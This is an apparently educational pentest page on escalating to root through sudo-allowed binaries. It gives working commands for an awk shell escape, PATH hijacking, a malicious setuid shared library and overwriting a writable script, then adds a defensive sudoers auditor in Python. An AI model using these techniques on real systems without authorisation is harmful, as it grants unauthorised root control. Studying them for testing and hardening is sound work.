Sudo Binaries
Theory
On this page, we speak about vulnerabilities within a sudo binary/script itself. Custom or known binaries/scripts may be exploited and allow us to subvert sudo's intended functionality.
Practice
Known Sudo Binaries Exploits
If the binary is allowed to run as sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
If you find that a binary can be run as sudo, you can check on GTFOBins for known exploits.
$ sudo -l
User demo may run the following commands on crashlab:
(root): /usr/bin/awk

If you can run a binary with sudo rights, you may want to have a look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with awk, we can spawn a shell with the following command:

sudo awk 'BEGIN {system("/bin/sh")}'

No Command Path Exploit
If a sudo binary/script executes another command without specifying its full path, we can abuse it to get a privilege escalation.
Note that this only works when env_reset and secure_path are not set.
You may use strings to spot calls to other binaries, or do some reverse engineering on the sudo binary.

$ sudo -l
User demo may run the following commands on crashlab:
(root): /opt/bin/the-sudo-bin

$ strings ./the-sudo-bin
...
find
...

We can create a malicious executable with the same name as the one called by the sudo binary.

echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find

Then, set the PATH environment variable before executing the sudo binary.

# Sudo with modified PATH
export PATH=/tmp:$PATH
./the-sudo-bin

Shared Library Hijacking
If you find some binary with sudo permissions, you can check whether all the .so files it needs are loaded correctly.

strace the-sudo-bin 2>&1 | grep -i -E "open|access|no such file"

You can also check whether the sudo binary is loading a library from a folder where we can write:
# Let's find a sudo binary using a non-standard library
ldd the-sudo-bin
something.so => /lib/x86_64-linux-gnu/something.so

# The sudo binary also loads libraries from a custom location where we can write
readelf -d the-sudo-bin | grep PATH
0x000000000000001d (RUNPATH) Library runpath: [/development]

Alternatively, you could use the strings command to find the shared libraries in use:

strings ./the-sudo-bin | grep -i '\.so'

For example, if you find that the sudo binary fails to load /home/user/.config/libcalc.so, or that you can overwrite it, you can exploit it.
Write a malicious shared library:

// Saved to /home/user/.config/libcalc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   // setuid, setgid

static void hijack() __attribute__((constructor));

void hijack() {
    printf("Hello from the bad library\n");
    // setresuid(0,0,0);
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}

Compile it:

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

Execute the sudo binary:

sudo the-sudo-bin

Weak File Permissions
If you find some binary/script with sudo permissions, you can check whether you have enough rights to overwrite it. If so, you can replace it with a malicious one.

sudo -l
(root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py

Check permissions:

ls -la /home/<username>/
ls -la /home/<username>/example.py

If the python script is in a directory that you own, or if you have direct write access to it, we can remove the script and create a new one with the same name.

rm -rf /home/<username>/example.py
touch /home/<username>/example.py

We can insert arbitrary code in the new script. For example:

import os;os.system('/bin/bash')
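As an added example (not part of the original page), a small Python auditor that looks for the conditions the No Command Path and Weak File Permissions sections rely on: env_reset switched off or secure_path absent from the sudoers Defaults, sudoers commands given without an absolute path or pointing into a user's home, and target files that group or others can rewrite or replace. The sudoers fragment, user names and paths are constructed; secure_path is reported as absent when it is not in the file, so confirm any compiled-in default with sudo -V as root.

```python
import os
import re
import stat
import tempfile

# Constructed sudoers fragment (not from any real host) showing the weaknesses this
# page describes: env_reset off, no secure_path, a relative command, a script in $HOME.
SAMPLE_SUDOERS = """\
Defaults    !env_reset
demo    crashlab = (root) /usr/bin/awk
demo    crashlab = (root) NOPASSWD: /usr/bin/python3 /home/demo/example.py
ops     ALL = (root) the-sudo-bin
"""

# user host = (runas) [TAG: ...] command [args]
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\([^)]*\)\s*)?(?:\w+:\s*)*(.+)$")

def audit_sudoers(text):
    """Return (rule, finding) pairs for lines matching this page's weak patterns."""
    findings = []
    defaults = " ".join(l for l in text.splitlines() if l.startswith("Defaults"))
    if "!env_reset" in defaults:
        findings.append(("Defaults", "env_reset disabled: caller environment reaches the target"))
    if "secure_path" not in defaults:
        findings.append(("Defaults", "secure_path unset: relative commands resolve via caller PATH"))
    for line in text.splitlines():
        m = RULE_RE.match(line)
        argv = m.group(3).split() if m and not line.startswith(("#", "Defaults")) else []
        if argv and not argv[0].startswith("/"):
            findings.append((line, "command without absolute path"))
        findings += [(line, f"argument {a} lives under a user home")
                     for a in argv[1:] if a.startswith("/home/")]
    return findings

def writable_target(path):
    """Reason string if `path` or its directory is writable by group/others, else None."""
    loose = stat.S_IWGRP | stat.S_IWOTH
    if os.stat(path).st_mode & loose:
        return f"{path} is group/world writable"
    parent_mode = os.stat(os.path.dirname(path) or ".").st_mode
    if (parent_mode & loose) and not (parent_mode & stat.S_ISVTX):
        return f"directory of {path} is writable: the target can be replaced"
    return None

def demo_weak_target():
    path = os.path.join(tempfile.mkdtemp(), "example.py")  # throwaway constructed target
    open(path, "w").close()
    os.chmod(path, 0o666)  # a sudo target anyone can edit
    return writable_target(path)
```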